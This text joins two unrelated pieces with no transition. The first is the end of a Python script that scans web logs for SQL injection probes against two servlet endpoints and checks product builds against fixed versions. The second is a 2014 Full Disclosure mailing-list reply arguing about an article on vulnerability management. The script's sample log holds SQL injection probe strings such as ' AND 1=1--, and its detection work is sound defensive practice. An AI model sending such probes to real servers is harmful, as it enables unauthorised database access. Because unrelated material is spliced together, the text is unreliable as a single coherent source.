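    for value in entry["query"].get("sv", []):
        if len(value) > LONG_VALUE or SQLI_RE.search(value):
            return cve
    return None


def scan(lines):
    """(source ip, path, cve) for every line classify() flags."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        cve = classify(entry)
        if cve is not None:
            findings.append((entry["ip"], entry["path"], cve))
    return findings


def is_affected(product, build):
    """True if build is below the first fixed build for DC, PMP or IT360."""
    fixed = FIXED_BUILDS.get(product.upper())
    if fixed is None:
        raise ValueError(f"unknown product {product!r}")
    return int(build) < fixed


# Constructed sample: two probes, a benign request, a POST, an unrelated path.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Aug/2014:10:01:02 +0000] "GET /LinkViewFetchServlet.dat?sv=1%27%20AND%201%3D1-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Aug/2014:10:01:09 +0000] "GET /console/MetadataServlet.dat?sv=1%27%20OR%201%3D1-- HTTP/1.1" 200 512',
    '198.51.100.4 - - [20/Aug/2014:10:02:00 +0000] "GET /LinkViewFetchServlet.dat?sv=42 HTTP/1.1" 200 128',
    '198.51.100.4 - - [20/Aug/2014:10:02:30 +0000] "POST /LinkViewFetchServlet.dat?sv=1%27-- HTTP/1.1" 200 128',
    '198.51.100.9 - - [20/Aug/2014:10:03:00 +0000] "GET /search.do?q=%27%20OR%201%3D1 HTTP/1.1" 200 2048',
    "not a log line",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
    print("DC build 90033 affected:", is_affected("DC", 90033))
```

The keyword list is deliberately crude: it is there to surface probes of these two endpoints, not to be a general SQL injection detector, and the GET-only filter mirrors the advisory's statement that the injection cannot be triggered any other way. The build check treats anything below the follow-up's fixed builds as affected, which matches the advisory's "all versions since 2006" statement.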


Re: [FD] So You Like Pain and Vulnerability Management? New Article.

2014-05-13 Thread Pedro Ribeiro
On 12 May 2014 19:48, Pete Herzog li...@isecom.org wrote:

 Hi, I’m your friend and security researcher, Pete Herzog. You might
 know me from other public service announcements such as the widely
 anticipated, upcoming workshop Secrets of Security, and critic’s
 choice award winners: Teaching Your Teen to Hack Police Cars, and
 Help! My Monkey is Posting Pictures to Facebook!

 But I’m here today to take a moment and talk to you about the pain of
 neglect, isolation, abuse, and infection, better known as
 “vulnerability management”. In many ways vulnerability management can
 be part of a healthy system and over-all good security. But there’s
 many important differences between vulnerability management and
 security that you should know about:

 That's how my new article starts. 5 points on the pain of
 vulnerability management and how to make it hurt less. It's posted
 here:


http://www.tripwire.com/state-of-security/vulnerability-management/so-you-like-pain-and-vulnerability-management/


 Feel free to discuss with me on Twitter @peteherzog and #securitypain
 and #helpmymonkeyispostingpicturestofacebook ;)

 Sincerely,
 -pete.

 --
 Pete Herzog - Managing Director - p...@isecom.org

Hi,

I fail to see the point of the article and I think you are making some
major assumptions here while at the same time stating the obvious.

First, who is the audience of the article? As a vulnerability manager
myself, I find it insulting that you think that I don't know that finding
vulnerabilities by itself without ANY other security controls will make my
employer secure.

Secondly, you are saying that vulnerability management = scanning
something with a vulnerability scanner, reviewing the output and patching. As it
says on Wikipedia, it is much more than that - it is the cyclical practice
of identifying, classifying, remediating, and mitigating vulnerabilities
[¹].
So at the very least I would define it as identifying possible
vulnerabilities with various tools - scanners, internal and external
pentests, source code review, fuzzing, bug reports, etc - and managing
their life cycle to the end by either patching, putting a control in place
or even signing it off as an acceptable risk.

Also you seem to focus solely on the problem of patching closed source
software. But nowadays most of the attacks are done via the Web layer, and
in most companies the Web layer is developed in house. So you can much more
effectively find vulnerabilities with a source code review than just
patching them as they appear.

As the article seems to imply, vulnerability management is about reducing
the risk and the overall attack surface. But I thought this was common
knowledge, especially among people who consider themselves vulnerability
managers?

Regards
Pedro

[¹] http://en.m.wikipedia.org/wiki/Vulnerability_management
